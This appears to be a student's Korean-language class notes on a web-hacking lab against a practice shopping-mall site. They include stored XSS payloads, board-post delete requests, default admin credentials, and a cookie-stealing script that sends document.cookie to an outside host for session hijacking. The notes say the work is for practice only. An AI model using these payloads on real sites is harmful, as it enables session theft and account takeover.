로그인

오후

작성: 2026.08.08 05:39 최근 수정: 2026.08.08 08:46
오후 수업

연습 해킹 도메인 : http://virtual.izerone.co.kr:8203/nayamall/

step1 
글쓰기

step2
경고창 작동
<script>alert('^^');</script>

<script>alert(document.cookie);</script>

delete_ok.php

POST
http://virtual.izerone.co.kr:8203/nayamall/paran_v10/delete.php?id=qna&mode=delete&no=175&page=1&cate=&keyword=&keykind=
http://virtual.izerone.co.kr:8203/nayamall/paran_v10/delete.php?
id=qna&mode=delete&no=179&page=1&cate=&keyword=&keykind=
http://virtual.izerone.co.kr:8203/nayamall/paran_v10/delete/qna/delete/179


page=1&id=qna&no=150&mode=delete&keyword=&category=

step3
<script>location.href='http://naver.com';</script>

step4
<script>location.href='http://jeonjucom.kr:8026?cookie='+document.cookie;</script>

step5
전송된 document.cookie를 저장하는 파이썬 프로그램 만들기

step6
서버쪽으로 값을 전송하면 admin / 
admin


해킹 값 버프스위트 































이런 느낌이다 . 








버프 스위트로 해서 > 삭제 기능 하는 법을 먼저 마스터를 한다 그다음으로 보고 판단할건데 < 삭제 및 수정 기능을 먼저 봐야하고 절때 외부에서 사용 하는 일은 없어야한다 

방식은 순서대로 말하면 일단 홈페이지에서 정보 취합을 한다 < 

정보 취합이란
플라스크 기반이라서 플라스크는 가상은 꼭 만들어준다 

1. 버프스위트를 통해 게시글 및 어디위치로 움직이는지 까지 테스트 해보고 판단 한다 < 
2. 홈페이지 도메인 회원 가입 후 > 게시물 작성 또는 삭제 방식의 프로그램을 추출 해낸다 < 
3. 이걸 왜하냐 ? 게시물에 악성 코드 비슷한 프로그램을 돌리는데 
4. HTML사용 으로 하여끔 작성 하면 삭제가 안된다 < 
5. 삭제가 되야 멀 하던지 할텐데 말이다.
6. 삭제 도메인을 따라가면 삭제 위치까지는 도착 한다 

여기서 취합을 한 후에 < 준비를 한다 무슨 준비를 하냐

해킹 시도를 할것이다 
1. 해킹 시도는 일단 vs 코드 방식으로 진행 할건데 그 중 아이피랑 바꿔서 진행 할거다 
2. 세션값을 탈취 해야하므로써 난 게시물을 올리고 기다렸다가 클릭 해서 들어오는 순간 바로 탈취한다
3. 홈페이지로 돌아가서 f12 개발자 모드로가서 맨위 사진 보면 저런 사진으로 탈취 하는거다 
내가 이해하기론 그렇다
다만 

제일 중요한건 어디서 해킹을 못한다 왜냐 ?
요즘은 HTML사용 자체 게시물을 올리지 못 할 뿐더러 그걸 해도 클릭 안하는 경우가 엄청 대다수다 나쁜짓 하지말자
노트 이미지
이 노트는 로그인하지 않아도 열람할 수 있습니다. 작성·수정·삭제는 관리자 로그인 후 가능합니다.